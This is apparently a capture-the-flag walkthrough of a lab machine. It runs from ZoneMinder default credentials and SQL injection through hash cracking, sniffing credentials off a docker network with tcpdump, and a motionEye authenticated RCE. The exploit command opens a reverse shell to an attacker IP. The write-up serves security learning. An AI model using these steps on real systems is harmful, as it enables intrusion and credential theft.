deab9f1a458cc392883f9a4f8dbc9901.png

Port Enumeration

Nmap only reveal http and ssh active.
1669e3941cd2f251cbb75006a2e2f33f.png

Web enumeration

First thing i see in the web is a ZoneMinder log panel.
7ead980dc9a0c588ee03b1341f74f262.png
ZoneMinder is a lot of things, and secure isnt one of them, thats not my first time with this software in a CTF, so, ill look for vulnerabilities.
Using the default credentials, admin:admin, im able to log in.
9ebbefad1723993e17947c28446cf826.png
Here, im able to see the version
9702002b427ee7764cecd40ed9e99266.png
This versión is vulnerable to bolean SQLI
ab110218e2d51859842448b48c09848b.png
Using a exploit, Im able to comfirm the vulnerability.
dacb7325f55c9608325fb294853dd6bc.png

SQLI

Using the same exploit, I dump the user table, where i found 3 users and their hashes.
01205973d05158071c6f3c57fedf50e2.png
Admin password is admin, but we have another 2 users, so, john, smash.

Hash Crack

After some time, Im able to break the mark password.
3ef2ea36ea6b8db918a2fdc12abd14a0.png
With this password, i can log as mark with ssh.
a6814753691dc10aa8a998af1b0a23af.png

Mark user enumeration

In this server i only see 2 users, my user and sa_mark.
39e469b205b7d1a2d15337b17c5a27b3.png
After checking the interfaces i found a active docker.
21829e6af51a5c416a85b5fed4b4da2f.png
And some bringe interfaces.
d20403d022891ec690b04e31120554f5.png

Bringe docker network sniffing

I use tcpdump to hear both interfaces.

tcpdump -i any -nn -A tcp

And im able to capture some interesting pachets, with an user and a password.
1225726a2f078669b25eb19f28a1920e.png
With this password I can log as sa_mark and take the user flag.
4ce0a03bbfd8ee6a6cd6d2a0c56e332c.png

sa_mark enumeration

First thing I see is a important-looking pdf file in mark home.
6419c2be9862c2f071ad7558030657c2.png
It looks like an announcment of migration, and the more important, the same credentials can be used in this new platform.
0825230d776be06460100984ede1204b.png

Privilege escalation

WIth this hint, I use ss -tulnp to search for this new site.
3219fcadc3f16939bcd97c16626b55f3.png
And, using curl, i found tho this site is hosted in 8765 port.
Now, i use ssh to port foward this service.

ssh -L 8765:localhost:8765 sa_mark@cctv.htb

With this, I found this page, who is working with motioneye.
836846b0db1b2c6f59448da1fdda34bd.png
With a bit of research I found an athenticated RCE vulnerability.
dfe2f98376c82126a2d155cd600e1163.png
You need the admin password to execute this script, bout you can find it in the file motion.conf.
9cf665720b351c8608d6c6cc2bec3301.png
I comfirm that this is a valid password.
f7802a34835d644f0748566f8c29c048.png
And now, I run the exploit.

python exploit.py -t http://127.0.0.1:8765 -p 989c5a8ee87a0e9521ec81a79187d162109282f0 -lh 10.10.16.26 -lp 4444

With this, im able to get a root shell.
59d11a0c6786a4b049fbcf798bb3e0e7.png
And with it, the flag.
b978ff0f811f41a689c135e77e36ffbc.png